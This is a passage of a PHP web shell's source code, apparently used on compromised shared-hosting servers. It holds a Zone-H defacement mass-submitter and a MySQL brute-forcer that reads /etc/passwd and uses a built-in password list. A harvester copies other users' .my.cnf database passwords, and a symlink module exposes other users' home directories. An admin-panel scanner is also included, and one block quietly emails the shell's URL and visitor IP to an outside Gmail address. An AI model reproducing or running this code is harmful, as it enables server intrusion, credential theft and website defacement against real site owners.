1877 return $hex;
1878}
1879
1880function file_get_contents2($u){
1881
1882 $ch = curl_init();
1883 curl_setopt($ch,CURLOPT_URL,$u);
1884 curl_setopt($ch, CURLOPT_HEADER, 0);
1885 curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1886 curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1887 $result = curl_exec($ch);
1888 return $result ;
1889 }
1890
1891?>
1892<?php
1893if (isset($_GET['idb']) && ($_GET['idb'] == 'zonh')) { ?>
1894<form action="?idb=zonh" method="post">
1895<br><br>
1896<center><span style="font-size:1.6em;"> .: Zone-H Mass Poster :. </span></center><center><BR><form action="" method="post"><input class="inputz" type="text" name="defacer" size="30" value="kefiex404" /><br> <select class="inputz"
1897name="hackmode">
1898<option>------------------------------------SELECT-------------------------------------</option>
1899<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
1900<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
1901<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
1902<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
1903<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
1904<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
1905<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
1906<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
1907<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
1908<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
1909<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
1910<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
1911<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
1912<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
1913<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
1914<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
1915<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
1916<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
1917<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
1918<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
1919<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
1920<option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
1921<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
1922<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
1923<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
1924<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
1925<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
1926<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
1927
1928<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
1929<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
1930option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
1931</select> <br>
1932
1933<select class="inputz" name="reason">
1934<option >------------------------------------SELECT-------------------------------------</option>
1935<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
1936<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
1937<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
1938<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
1939<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
1940<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
1941<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
1942option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
1943</select> <br>
1944<textarea class="inputz" name="domain" cols="90" rows="20" placeholder="List Of Domains, 20 Rows."></textarea><br>
1945<input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
1946</form>
1947<?
1948 echo "</form></center>";?>
1949<?
1950function ZoneH($url, $hacker, $hackmode,$reson, $site )
1951{
1952 $k = curl_init();
1953 curl_setopt($k, CURLOPT_URL, $url);
1954 curl_setopt($k,CURLOPT_POST,true);
1955 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1956 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1957 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1958 $kubra = curl_exec($k);
1959 curl_close($k);
1960 return $kubra;
1961}
1962{
1963 ob_start();
1964 $sub = @get_loaded_extensions();
1965 if(!in_array("curl", $sub))
1966 {
1967 die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
1968 }
1969
1970 $hacker = $_POST['defacer'];
1971 $method = $_POST['hackmode'];
1972 $neden = $_POST['reason'];
1973 $site = $_POST['domain'];
1974
1975 if (empty($hacker))
1976 {
1977 die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
1978 }
1979 elseif($method == "--------SELECT--------")
1980 {
1981 die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
1982 }
1983 elseif($neden == "--------SELECT--------")
1984 {
1985 die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
1986 }
1987 elseif(empty($site))
1988 {
1989 die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
1990 }
1991 $i = 0;
1992 $sites = explode("\n", $site);
1993 while($i < count($sites))
1994 {
1995 if(substr($sites[$i], 0, 4) != "http")
1996 {
1997 $sites[$i] = "http://".$sites[$i];
1998 }
1999 ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
2000 echo "Domain : ".$sites[$i]." Defaced Last Years !";
2001 ++$i;
2002 }
2003 echo "";
2004 }
2005}
2006?>
2007<?php
2008if (isset($_GET['idb']) && ($_GET['idb'] == 'brute')) { ?>
2009<form action="?idb=brute" method="post">
2010<?php ?>
2011<html>
2012<head>
2013<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
2014<body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif">
2015<center>
2016<form method="POST">
2017<strong>
2018<input name="page" type="hidden" value="find">
2019</strong>
2020 <div style="width:90%">
2021
2022<div id="result">
2023<br /><br />
2024</div>
2025 <div id="mp" style="width:49%;float:left">
2026 <b>~ UserName ~</b>
2027 </div>
2028 <div id="mp" style="width:49%;float:left">
2029
2030 <b>~ PassWord ~</b>
2031 </div>
2032 <div id="mp" style="clear:both;width:49%;float:left">
2033 <textarea rows="10" class="coode" style="width:100%" name="usernames"><? if($_POST['page']=='find' && $_POST['usernames']<=''){$lines=@file("/etc/passwd");foreach($lines as $nr=>$val){$str=explode(":",$val);echo $str[0]."
2034";}}else{echo $_POST['usernames'];} ?></textarea>
2035 </div>
2036 <div id="s" style="width:2%;float:left">
2037
2038 </div>
2039 <div id="s" style="width:49%;float:left">
2040 <textarea rows="10" class="coode" style="width:100%" name="passwords"><? if($_POST['page']=='find' && $_POST['passwords']<=''){echo "123
20411234
204212345
2043123456
20441234567
204512345678
2046123456789
20471234567890
2048Password
2049pass
2050admin
2051admin123
2052admin1234
2053admin12345
2054admin123456
2055admin1234567
2056admin12345678
2057admin123456789
2058admin1234567890
2059administrator123
2060administrator1234
2061administrator12345
2062administrator123456
2063administrator1234567
2064administrator12345678
2065administrator123456789
2066administrator1234567890
2067password123
2068password1234
2069password12345
2070password123456
2071password1234567
2072password12345678
2073password123456789
2074password1234567890
2075123456
2076123123
20771234
207812345
207912369874
2080123456789
2081112233
208212345678
2083123654
2084123654789
20851234admin
2086password
2087passwd1
2088password123
2089test123
2090159357
2091147258
2092159951
2093123321
2094ADMIN
2095195159
2096147852
2097Admin
2098Administrator
2099Demo
2100User
2101user
2102useruser
2103987456321
2104741852
2105321987
2106357159
21071234566
21081234567899
2109111222
2110Administrateur
2111administrateur
21120123456
21130123456789
21140147258
2115147258
2116987654
2117963852
2118369258
2119456789
2120456321
2121456123
2122ADMIN1234
2123Admin1234
2124admin123456
2125admin1234
2126admin01234
2127000000
2128142536
2129632541
2130"; }else{echo $_POST['passwords'];} ?></textarea>
2131
2132 </div>
2133 </div>
2134 <div style="width:90%;clear:both">
2135 <br><p><input type="submit" name="submit" class="inputzbut" value="Go !" style="width:120px;height:30px;" /></p>
2136 </div>
2137 <br /><br /><br />
2138
2139</form>
2140
2141
2142<?
2143if($_POST['page']=='find')
2144{
2145echo"<div id='result'>";
2146if(isset($_POST['usernames']) && isset($_POST['passwords']))
2147{
2148
2149 $a1 = explode("
2150",$_POST['usernames']);
2151 $a2 = explode("
2152",$_POST['passwords']);
2153 $id2 = count($a2);
2154 $ok = 0;
2155 foreach($a1 as $user )
2156 {
2157 if($user !== '')
2158 {
2159 $user=trim($user);
2160 for($i=0;$i<=$id2;$i++)
2161 {
2162 $pass = trim($a2[$i]);
2163 if(@mysql_connect('localhost',$user,$pass))
2164 {
2165 if($pass !== ''){
2166 echo "<b>[ IDBTE4M ]=> </b> <b>User[<font color='green'> $user </font>] Pass[<font color='green'> $pass </font>]</b><br>";
2167 $ok++;
2168 }}
2169 }
2170 }
2171 }
2172 echo "<hr><b>You Found <font color=green>$ok</font>BY IDBTE4M</b>";
2173 exit;
2174}
2175echo'</div>';
2176}
2177}
2178?>
2179
2180<?php
2181if (isset($_GET['idb']) && ($_GET['idb'] == 'cp')) {
2182?>
2183<form action="?&idb=cp" method="post">
2184<?php
2185/**
2186 * @author: FaisaL Ahmed aka blue X
2187 * @mail: me@faialahmed.me
2188 * @Screenshot: http://prntscr.com/7c1p34
2189 * @Last Updated: 01 June 2015
2190*/
2191
2192@ini_set('display_errors',0);
2193function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
2194 $ar0=explode($marqueurDebutLien, $text);
2195 $ar1=explode($marqueurFinLien, $ar0[$i]);
2196 return trim($ar1[0]);
2197}
2198echo "<center>";
2199$d0mains = @file('/etc/named.conf');
2200$domains = scandir("/var/named");
2201
2202if ($domains or $d0mains)
2203{
2204 $domains = scandir("/var/named");
2205 if($domains) {
2206echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2207$count=1;
2208$dc = 0;
2209$list = scandir("/var/named");
2210foreach($list as $domain){
2211if(strpos($domain,".db")){
2212$domain = str_replace('.db','',$domain);
2213$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2214$dirz = '/home/'.$owner['name'].'/.my.cnf';
2215$path = getcwd();
2216
2217if (is_readable($dirz)) {
2218copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
2219$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
2220$password=entre2v2($p,'password="','"');
2221echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
2222$dc++;
2223}
2224
2225}
2226}
2227echo '</table>';
2228$total = $dc;
2229echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2230echo '</center>';
2231}else{
2232$d0mains = @file('/etc/named.conf');
2233 if($d0mains) {
2234echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2235$count=1;
2236$dc = 0;
2237$mck = array();
2238foreach($d0mains as $d0main){
2239 if(@eregi('zone',$d0main)){
2240 preg_match_all('#zone "(.*)"#',$d0main,$domain);
2241 flush();
2242 if(strlen(trim($domain[1][0])) >2){
2243 $mck[] = $domain[1][0];
2244 }
2245 }
2246}
2247$mck = array_unique($mck);
2248$usr = array();
2249$dmn = array();
2250foreach($mck as $o) {
2251 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
2252 $usr[] = $infos['name'];
2253 $dmn[] = $o;
2254}
2255array_multisort($usr,$dmn);
2256$dt = file('/etc/passwd');
2257$passwd = array();
2258foreach($dt as $d) {
2259 $r = explode(':',$d);
2260 if(strpos($r[5],'home')) {
2261 $passwd[$r[0]] = $r[5];
2262 }
2263}
2264$l=0;
2265$j=1;
2266foreach($usr as $r) {
2267$dirz = '/home/'.$r.'/.my.cnf';
2268$path = getcwd();
2269if (is_readable($dirz)) {
2270copy($dirz, ''.$path.'/'.$r.'.txt');
2271$p=file_get_contents(''.$path.'/'.$r.'.txt');
2272$password=entre2v2($p,'password="','"');
2273echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
2274$dc++;
2275 flush();
2276 $l=$l?0:1;
2277 $j++;
2278 }
2279 }
2280 }
2281echo '</table>';
2282$total = $dc;
2283echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2284echo '</center>';
2285
2286}
2287}else{
2288echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
2289}
2290
2291echo "</body></html>";
2292}
2293?>
2294
2295<?php
2296@mkdir('-',0777);
2297$htcs = "Options Indexes FollowSymLinks\nDirectoryIndex -\nAddType txt .php\nAddHandler txt .php";
2298$f =@fopen ('-/.htaccess','w');
2299fwrite($f , $htcs);
2300@symlink("/","-/-");
2301$pg = basename(__FILE__);
2302/// user + domine + symlink ///
2303if(isset($_REQUEST['idb']))
2304{
2305
2306switch ($_REQUEST['idb'])
2307{
2308case 'symlink':
2309
2310if(!is_file('named.txt')){
2311
2312$d00m = @file("/etc/named.conf");
2313
2314}else{
2315
2316$d00m = @file("named.txt");
2317
2318
2319}
2320if(!$d00m)
2321{
2322
2323die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
2324}
2325else
2326
2327{
2328echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
2329foreach($d00m as $dom){
2330
2331if(eregi("zone",$dom)){
2332
2333preg_match_all('#zone "(.*)"#', $dom, $domsws);
2334
2335flush();
2336
2337if(strlen(trim($domsws[1][0])) > 2){
2338
2339$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
2340
2341flush();
2342
2343
2344
2345$site = $user['name'] ;
2346
2347
2348@symlink("/","-/-");
2349
2350$site = $domsws[1][0];
2351
2352$ir = 'ir';
2353
2354$il = 'il';
2355
2356if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
2357{
2358$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px blue; '>".$domsws[1][0]."</div>";
2359}
2360
2361
2362echo "
2363<tr>
2364
2365<td>
2366<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
2367</td>
2368
2369
2370<td>
2371".$user['name']."
2372</td>
2373
2374
2375
2376
2377
2378
2379<td>
2380<a href='-/-/home/".$user['name']."/public_html' target='_blank'>symlink </a>
2381</td>
2382
2383
2384</tr></div> ";
2385
2386
2387flush();
2388flush();
2389
2390}
2391}
2392}
2393}
2394
2395
2396
2397
2398break;
2399@ini_set('output_buffering', 0);
2400@ini_set('display_errors', 0);
2401set_time_limit(0);
2402ini_set('memory_limit', '64M');
2403header('Content-Type: text/html; charset=UTF-8');
2404$tujuanmail = 'aghacker67@gmail.com';
2405$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
2406$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
2407mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
2408
2409
2410// passwd
2411
2412case 'passwd':
2413
2414if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
2415
2416
2417$cont = stripcslashes($_POST['file']);
2418
2419if(!file_exists('passwd.txt')){
2420
2421$f = @fopen('passwd.txt','w');
2422
2423$w = @fwrite($f,$cont);
2424
2425fclose($f);
2426}
2427if($w or @filesize('passwd.txt') > 0){
2428// * SHOW * //
2429
2430echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
2431flush();
2432
2433$fil3 = file('passwd.txt');
2434
2435foreach ($fil3 as $f){
2436
2437$u=explode(':', $f);
2438$user = $u['0'];
2439
2440
2441
2442echo "
2443<tr>
2444
2445
2446
2447<td width='15%'>
2448$user
2449</td>
2450
2451
2452
2453
2454
2455
2456<td width='10%'>
2457<a href='-/-/home/$user/public_html' target='_blank'>Symlink </a>
2458</td>
2459
2460<td width='10%'>
2461<a href='$pageFTP/-/-/home/$user/public_html' target='_blank'>FTP</a>
2462</td>
2463
2464
2465
2466</tr></div> ";
2467
2468
2469flush();
2470flush();
2471
2472
2473}
2474
2475
2476
2477
2478
2479
2480die ("</tr></div>");
2481
2482
2483}
2484
2485
2486
2487
2488
2489}
2490
2491
2492
2493echo "read /etc/passwd";
2494echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
2495flush();
2496
2497$file = '/etc/passwd';
2498
2499
2500$r3ad = @fopen($file, 'r');
2501if ($r3ad){
2502$content = @fread($r3ad, @filesize($file));
2503echo "".htmlentities($content)."";
2504}
2505elseif(!$r3ad)
2506{
2507$r3ad = @show_source($file) ;
2508}
2509elseif(!$r3ad)
2510{
2511$r3ad = @highlight_file($file);
2512}
2513elseif(!$r3ad)
2514{
2515
2516for($uid=0;$uid<1000;$uid++){
2517$ara = posix_getpwuid($uid);
2518if (!empty($ara)) {
2519while (list ($key, $val) = each($ara)){
2520print "$val:";
2521}
2522print "\n";
2523}
2524
2525}
2526
2527}
2528
2529
2530flush();
2531
2532
2533echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>";
2534flush();
2535
2536break;
2537
2538
2539############################ index #########################3
2540
2541default:
2542header("Location: $pg");
2543
2544
2545
2546
2547}
2548}
2549
2550?>
2551<?php
2552if (isset($_GET['idb']) && ($_GET['idb'] == 'finder')) {
2553?>
2554<form action="?&idb=finder" method="post">
2555<?php
2556set_time_limit(0);
2557error_reporting(0);
2558$list['front'] =
2559"
2560admin
2561adm
2562admincp
2563admcp
2564cp
2565modcp
2566moderatorcp
2567adminare
2568admins
2569cpanel
2570controlpanel";
2571$list['end'] = "
2572admin1.php
2573admin1.html
2574admin2.php
2575admin2.html
2576yonetim.php
2577yonetim.html
2578yonetici.php
2579yonetici.html
2580ccms/
2581ccms/login.php
2582ccms/index.php
2583maintenance/
2584webmaster/
2585adm/
2586configuration/
2587configure/
2588websvn/
2589admin/
2590admin/account.php
2591admin/account.html
2592admin/index.php
2593admin/index.html
2594admin/login.php
2595admin/login.html
2596admin/home.php
2597admin/controlpanel.html
2598admin/controlpanel.php
2599admin.php
2600admin.html
2601admin/cp.php
2602admin/cp.html
2603cp.php
2604cp.html
2605administrator/
2606administrator/index.html
2607administrator/index.php
2608administrator/login.html
2609administrator/login.php
2610administrator/account.html
2611administrator/account.php
2612administrator.php
2613administrator.html
2614login.php
2615login.html
2616modelsearch/login.php
2617moderator.php
2618moderator.html
2619moderator/login.php
2620moderator/login.html
2621moderator/admin.php
2622moderator/admin.html
2623moderator/
2624account.php
2625account.html
2626controlpanel/
2627controlpanel.php
2628controlpanel.html
2629admincontrol.php
2630admincontrol.html
2631adminpanel.php
2632adminpanel.html
2633admin1.asp
2634admin2.asp
2635yonetim.asp
2636yonetici.asp
2637admin/account.asp
2638admin/index.asp
2639admin/login.asp
2640admin/home.asp
2641admin/controlpanel.asp
2642admin.asp
2643admin/cp.asp
2644cp.asp
2645administrator/index.asp
2646administrator/login.asp
2647administrator/account.asp
2648administrator.asp
2649login.asp
2650modelsearch/login.asp
2651moderator.asp
2652moderator/login.asp
2653moderator/admin.asp
2654account.asp
2655controlpanel.asp
2656admincontrol.asp
2657adminpanel.asp
2658fileadmin/
2659fileadmin.php
2660fileadmin.asp
2661fileadmin.html
2662administration/
2663administration.php
2664administration.html
2665sysadmin.php
2666sysadmin.html
2667phpmyadmin/
2668myadmin/
2669sysadmin.asp
2670sysadmin/
2671ur-admin.asp
2672ur-admin.php
2673ur-admin.html
2674ur-admin/
2675Server.php
2676Server.html
2677Server.asp
2678Server/
2679wp-admin/
2680administr8.php
2681administr8.html
2682administr8/
2683administr8.asp
2684webadmin/
2685webadmin.php
2686webadmin.asp
2687webadmin.html
2688administratie/
2689admins/
2690admins.php
2691admins.asp
2692admins.html
2693administrivia/
2694Database_Administration/
2695WebAdmin/
2696useradmin/
2697sysadmins/
2698admin1/
2699system-administration/
2700administrators/
2701pgadmin/
2702directadmin/
2703staradmin/
2704ServerAdministrator/
2705SysAdmin/
2706administer/
2707LiveUser_Admin/
2708sys-admin/
2709typo3/
2710panel/
2711cpanel/
2712cPanel/
2713cpanel_file/
2714platz_login/
2715rcLogin/
2716blogindex/
2717formslogin/
2718autologin/
2719support_login/
2720meta_login/
2721manuallogin/
2722simpleLogin/
2723loginflat/
2724utility_login/
2725showlogin/
2726memlogin/
2727members/
2728login-redirect/
2729sub-login/
2730wp-login/
2731login1/
2732dir-login/
2733login_db/
2734xlogin/
2735smblogin/
2736customer_login/
2737UserLogin/
2738login-us/
2739acct_login/
2740admin_area/
2741bigadmin/
2742project-admins/
2743phppgadmin/
2744pureadmin/
2745sql-admin/
2746radmind/
2747openvpnadmin/
2748wizmysqladmin/
2749vadmind/
2750ezsqliteadmin/
2751hpwebjetadmin/
2752newsadmin/
2753adminpro/
2754Lotus_Domino_Admin/
2755bbadmin/
2756vmailadmin/
2757Indy_admin/
2758ccp14admin/
2759irc-macadmin/
2760banneradmin/
2761sshadmin/
2762phpldapadmin/
2763macadmin/
2764administratoraccounts/
2765admin4_account/
2766admin4_colon/
2767radmind-1/
2768Super-Admin/
2769AdminTools/
2770cmsadmin/
2771SysAdmin2/
2772globes_admin/
2773cadmins/
2774phpSQLiteAdmin/
2775navSiteAdmin/
2776server_admin_small/
2777logo_sysadmin/
2778server/
2779database_administration/
2780power_user/
2781system_administration/
2782ss_vms_admin_sm/
2783adminarea/
2784bb-admin/
2785adminLogin/
2786panel-administracion/
2787instadmin/
2788memberadmin/
2789administratorlogin/
2790admin/admin.php
2791admin_area/admin.php
2792admin_area/login.php
2793siteadmin/login.php
2794siteadmin/index.php
2795siteadmin/login.html
2796admin/admin.html
2797admin_area/index.php
2798bb-admin/index.php
2799bb-admin/login.php
2800bb-admin/admin.php
2801admin_area/login.html
2802admin_area/index.html
2803admincp/index.asp
2804admincp/login.asp
2805admincp/index.html
2806webadmin/index.html
2807webadmin/admin.html
2808webadmin/login.html
2809admin/admin_login.html
2810admin_login.html
2811panel-administracion/login.html
2812nsw/admin/login.php
2813webadmin/login.php
2814admin/admin_login.php
2815admin_login.php
2816admin_area/admin.html
2817pages/admin/admin-login.php
2818admin/admin-login.php
2819admin-login.php
2820bb-admin/index.html
2821bb-admin/login.html
2822bb-admin/admin.html
2823admin/home.html
2824pages/admin/admin-login.html
2825admin/admin-login.html
2826admin-login.html
2827admin/adminLogin.html
2828adminLogin.html
2829home.html
2830rcjakar/admin/login.php
2831adminarea/index.html
2832adminarea/admin.html
2833webadmin/index.php
2834webadmin/admin.php
2835user.html
2836modelsearch/login.html
2837adminarea/login.html
2838panel-administracion/index.html
2839panel-administracion/admin.html
2840modelsearch/index.html
2841modelsearch/admin.html
2842admincontrol/login.html
2843adm/index.html
2844adm.html
2845user.php
2846panel-administracion/login.php
2847wp-login.php
2848adminLogin.php
2849admin/adminLogin.php
2850home.php
2851adminarea/index.php
2852adminarea/admin.php
2853adminarea/login.php
2854panel-administracion/index.php
2855panel-administracion/admin.php
2856modelsearch/index.php
2857modelsearch/admin.php
2858admincontrol/login.php
2859adm/admloginuser.php
2860admloginuser.php
2861admin2/login.php
2862admin2/index.php
2863adm/index.php
2864adm.php
2865affiliate.php
2866adm_auth.php
2867memberadmin.php
2868administratorlogin.php
2869admin/admin.asp
2870admin_area/admin.asp
2871admin_area/login.asp
2872admin_area/index.asp
2873bb-admin/index.asp
2874bb-admin/login.asp
2875bb-admin/admin.asp
2876pages/admin/admin-login.asp
2877admin/admin-login.asp
2878admin-login.asp
2879user.asp
2880webadmin/index.asp
2881webadmin/admin.asp
2882webadmin/login.asp
2883admin/admin_login.asp
2884admin_login.asp
2885panel-administracion/login.asp
2886adminLogin.asp
2887admin/adminLogin.asp
2888home.asp
2889adminarea/index.asp
2890adminarea/admin.asp
2891adminarea/login.asp
2892panel-administracion/index.asp
2893panel-administracion/admin.asp
2894modelsearch/index.asp
2895modelsearch/admin.asp
2896admincontrol/login.asp
2897adm/admloginuser.asp
2898admloginuser.asp
2899admin2/login.asp
2900admin2/index.asp
2901adm/index.asp
2902adm.asp
2903affiliate.asp
2904adm_auth.asp
2905memberadmin.asp
2906administratorlogin.asp
2907siteadmin/login.asp
2908siteadmin/index.asp
2909ADMIN/
2910paneldecontrol/
2911login/
2912cms/
2913admon/
2914ADMON/
2915administrador/
2916ADMIN/login.php
2917panelc/
2918ADMIN/login.html";
2919function template() {
2920echo '
2921
2922<script type="text/javascript">
2923<!--
2924function insertcode($text, $place, $replace)
2925{
2926 var $this = $text;
2927 var logbox = document.getElementById($place);
2928 if($replace == 0)
2929 document.getElementById($place).innerHTML = logbox.innerHTML+$this;
2930 else
2931 document.getElementById($place).innerHTML = $this;
2932//document.getElementById("helpbox").innerHTML = $this;
2933}
2934-->
2935</script>
2936<br>
2937<br>
2938<h1 class="technique-two">
2939
2940
2941
2942</h1>
2943
2944<div class="wrapper">
2945<div class="red">
2946<div class="tube">
2947<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
2948<form action="" method="post" name="xploit_form">
2949
2950<tr>
2951<tr>
2952 <b><td>URL</td>
2953 <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
2954 </td>
2955</tr><tr>
2956 <td>404 string</td>
2957 <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
2958 </td></b>
2959</tr><br><td>
2960<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
2961</span></td></tr>
2962</form></td></tr>
2963<br /></table>
2964</div> <!-- /tube -->
2965</div> <!-- /red -->
2966<br />
2967<div class="green">
2968<div class="tube" id="rightcol">
2969Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
2970<b>Found ones:<br /></b>
2971</div> <!-- /tube -->
2972</div></center><!-- /green -->
2973<br clear="all" /><br />
2974<div class="blue">
2975<div class="tube" id="logbox">
2976<br />
2977<br />
2978Admin page Finder :<br /><br />
2979</div> <!-- /tube -->
2980</div> <!-- /blue -->
2981</div> <!-- /wrapper -->
2982<br clear="all"><br>';
2983}
2984function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
2985 if($br == 1) $msg .= "<br />";
2986 echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
2987 if($stop == 1) exit;
2988 @flush();@ob_flush();
2989}
2990function check($x, $front=0) {
2991 global $_POST,$site,$false;
2992 if($front == 0) $t = $site.$x;
2993 else $t = 'http://'.$x.'.'.$site.'/';
2994 $headers = get_headers($t);
2995 if (!eregi('200', $headers[0])) return 0;
2996 $data = @file_get_contents($t);
2997 if($_POST['xploit_404string'] == "") if($data == $false) return 0;
2998 if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
2999 return 1;
3000}
3001
3002// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3003template();
3004if(!isset($_POST['xploit_url'])) die;
3005if($_POST['xploit_url'] == '') die;
3006$site = $_POST['xploit_url'];
3007if ($site[strlen($site)-1] != "/") $site .= "/";
3008if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
3009$list['end'] = str_replace("\r", "", $list['end']);
3010$list['front'] = str_replace("\r", "", $list['front']);
3011$pathes = explode("\n", $list['end']);
3012$frontpathes = explode("\n", $list['front']);
3013show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
3014$verificate = 0;
3015foreach($pathes as $path) {
3016 show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
3017 $verificate++; show($verificate, 0, 0, 'verified', 1);
3018 if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
3019 else{
3020 show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
3021 show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
3022 }
3023}
3024preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
3025if(substr($site, 0, 3) == "www") $site = substr($site, 4);
3026foreach($frontpathes as $frontpath) {
3027 show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
